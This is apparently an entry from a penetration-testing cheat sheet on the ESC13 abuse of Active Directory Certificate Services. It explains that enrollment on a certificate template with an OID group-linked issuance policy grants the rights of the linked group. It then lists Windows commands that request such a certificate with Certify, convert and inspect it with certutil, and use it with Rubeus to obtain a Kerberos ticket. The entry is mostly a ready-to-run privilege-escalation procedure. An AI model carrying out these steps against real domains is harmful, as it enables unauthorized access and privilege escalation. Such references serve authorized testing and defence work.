ESC13
If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.
Windows
Request a certificate of the certificate template <template_name>
.\Certify.exe request /ca:<ca> /template:<template_name>
Save and convert the certificate
certutil -MergePFX .\esc13.pem .\esc13.pfx
Confirm the Client Authentication EKU and the ESC13OID issuance policy
certutil -Dump -v .\esc13.pfx
Authenticate (using the certificate)
.\Rubeus.exe asktgt /user:<user> /certificate:C:\esc13.pfx /nowrap
References
https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53